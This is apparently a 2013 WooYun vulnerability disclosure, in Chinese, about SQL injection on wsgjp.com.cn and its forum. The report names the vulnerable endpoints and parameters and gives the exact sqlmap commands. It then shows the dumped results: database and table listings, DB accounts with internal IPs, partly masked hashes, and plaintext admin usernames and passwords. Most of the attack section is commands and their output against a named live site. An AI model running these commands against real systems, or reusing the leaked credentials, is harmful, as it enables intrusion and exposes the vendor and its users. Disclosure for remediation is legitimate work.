漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040482
漏洞标题:网上管家婆#1 某站SQL注入导致大量信息泄露
相关厂商:wsgjp.com.cn
漏洞作者: 爱上平顶山
提交时间:2013-11-14 16:13
修复时间:2013-12-29 16:14
公开时间:2013-12-29 16:14
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-14: 细节已通知厂商并且等待厂商处理中
2013-11-14: 厂商已经确认,细节仅向厂商公开
2013-11-24: 细节向核心白帽子及相关领域专家公开
2013-12-04: 细节向普通白帽子公开
2013-12-14: 细节向实习白帽子公开
2013-12-29: 细节向公众公开
简要描述:
0.0
详细说明:
管家婆
点:
http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx post注入
post值:productId=10&companyName=q
http://bbs.mygjp.com/web/forum_search.aspx?text=1 盲注
利用SQLmap注入:
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --dbs
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --current-db
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --users
./sqlmap.py -u "http://www.wsgjp.com.cn/Charge/CheckCompanyName.ashx" --data "productId=10&companyName=q" -v 1 --tables -D "wsgjp_home"
数据库:
available databases [7]:
[*] mysql
[*] information_schema
[*] performance_schema
[*] agent
[*] narniahome
[*] wsgjp_bbs
[*] wsgjp_home
database management system users [202]:
[*] 'bjrepl'@'42.62.20.52'
[*] 'cactiuser'@'42.62.20.53'
[*] 'nagios'@'192.168.9.101'
[*] 'repl'@'192.168.9.4'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.9.1'
[*] 'root'@'192.168.9.2'
[*] 'root'@'42.62.20.53'
[*] 'root'@'localhost'
用户:
database management system users [202]:
[*] 'bjrepl'@'42.62.20.52'
[*] 'cactiuser'@'42.62.20.53'
[*] 'nagios'@'192.168.9.101'
[*] 'repl'@'192.168.9.4'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.9.1'
[*] 'root'@'192.168.9.2'
[*] 'root'@'42.62.20.53'
[*] 'root'@'localhost'
database management system users password hashes:
[*] bjrepl [1]:
password hash: Na******
[*] cactiuser [1]:
password hash: *8D812D06364E07D8C37BE124B1A2*******2AA7
[*] nagios [1]:
password hash: *8D812D06364E07D8C37BE124B1A2******22AA7
[*] repl [1]:
password hash: Na******
[*] root [7]:
password hash: ca*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
password hash: Na*******
列库:
Database: agent
[8 tables]
+---------------------------------+
| agentsinfo |
| checklog |
| news |
| product |
| star |
| support |
| trade |
| users |
+------------+
Database: agent
Table: users
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(4) |
| password | varchar(100) |
| permit | varchar(100) |
| username | varchar(20) |
+----------+--------------+
Database: agent
Table: users
[5 entries]
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | admini |
| 2 | lkr | 212042 |
| 4 | afe | 212042 |
| 5 | skx | 212042 |
| 6 | guofei | 123456 |
+----+----------+----------------------------------+
----------------------------------------------------
Database: wsgjp_bbs
[11 tables]
+-------------+
| blacklist |
| forum |
| links |
| logrecord |
| message |
| monderator |
| replies |
| replyremind |
| topic |
| ttype |
| users |
+-------------+
Database: wsgjp_bbs
Table: users
[9 columns]
+--------------+---------------+
| Column | Type |
+--------------+---------------+
| CompanyName | varchar(100) |
| Email | varchar(50) |
| ID | int(4) |
| IP | varchar(20) |
| PassWord | varchar(100) |
| PermitID | int(4) |
| RegisterDate | datetime |
| UserName | varchar(20) |
| UserPhoto | varchar(1000) |
+--------------+---------------+
------------------------------------------------
Database: narniahome
[98 tables]
+----------------------+
| activechargelog |
| admin |
| admintype |
| aftersalestype |
| afterserviceallotlog |
| afterservicelog |
| allcharge |
| applyinfo |
| assesstype |
| canclerecordlog |
| charge |
| chargelog |
| chargetype |
| clearpasslog |
| clienttrack |
| clienttype |
| clienttypejxc |
| commission |
| company |
| companymoduleinfo |
| customerallot |
| customersatelog |
| customerstate |
| customproblemtype |
| decemberactivelog |
| distributionrule |
| downloadlog |
| duty |
| dutylog |
| employee |
| forgetpassword |
| g6sy |
| g7questionnaire |
| goods |
| handlechargelog |
| handlestate |
| handseltimelog |
| hischargelog |
| loginlog |
| loginuser |
| lossandexpire |
| losscause |
| lossreason |
| lossreasonlog |
| lossrenewals |
| modifycompanynamelog |
| mytask |
| order |
| orderdetail |
| permitgroup |
| personalsellfollow |
| product |
| productmodule |
| productsuite |
| productsuite_detail |
| profile |
| proxy |
| proxykefu |
| record |
| recordlog |
| relationadminproduct |
| relationadmintype |
| residuallog |
| rollinfo |
| ruledetail |
| salegroup |
| servicelossreson |
| servicestate |
| servicestatistics |
| servicetype |
| shoptype |
| statistics |
| store_tmp_table |
| storeexpire |
| subscribe |
| subscribe_eshop5 |
| taobaoinfor |
| taobaoinfor_bak |
| taobaotmp |
| task |
| taskdetail |
| temp_checkes5 |
| tmp_company |
| tmp_effectuser |
| tmp_invalidate |
| tmp_table |
| tmptable_charge |
| tmptable_subscribe |
| train |
| traincompanys |
| traintype |
| userlogininfo |
| vbackmain |
| visitbacklog |
| visitplan |
| visitplans |
| visittype |
| webserviceerrorlog |
+----------------------+
Database: narniahome
Table: admin
[19 columns]
+---------------+---------------------+
| Column | Type |
+---------------+---------------------+
| agentId | bigint(20) unsigned |
| fullname | varchar(200) |
| groupid | int(4) |
| id | bigint(20) unsigned |
| isadmin | int(4) |
| isassign | tinyint(1) |
| isautovisit | int(4) |
| iscustom | int(2) |
| isgroupleader | int(4) |
| ismaintenance | int(2) |
| istrainer | int(1) |
| isuse | int(4) |
| name | varchar(50) |
| password | varchar(50) |
| permit | varchar(200) |
| permits | varchar(500) |
| proxyid | int(4) |
| salegroupid | int(4) |
| type | int(4) |
+---------------+---------------------+
admin graspadmin
--------------------------------------------------
Database: wsgjp_home
[28 tables]
+-------------------------------+
| active |
| businessmodes |
| cases |
| chargecenterproductidcontrast |
| companys |
| coursewaretype |
| eleven_questionnaire |
| fridenlyink |
| helpbindproduct |
| helpsection |
| helptype |
| imageinfo |
| loginactive |
| loginlog |
| messages |
| novicehelp |
| product |
| product_feature |
| productprice |
| productsection |
| producttype |
| service |
| servicebindproduct |
| servicetypes |
| users |
| videoclassification |
| videos |
| videosection |
+-------------------------------+
Database: wsgjp_home
Table: users
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| CompanyID | bigint(20) unsigned |
| Email | varchar(100) |
| ID | bigint(20) unsigned |
| Nickname | varchar(100) |
| Password | varchar(200) |
| permit | varchar(500) |
| Username | varchar(100) |
-----------------------------------
先到这里
ok 还有注入 自查。
漏洞证明:
如上
修复方案:
过滤
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-14 16:24
厂商回复:
感谢 @爱上平顶山 的工作。
最新状态:
暂无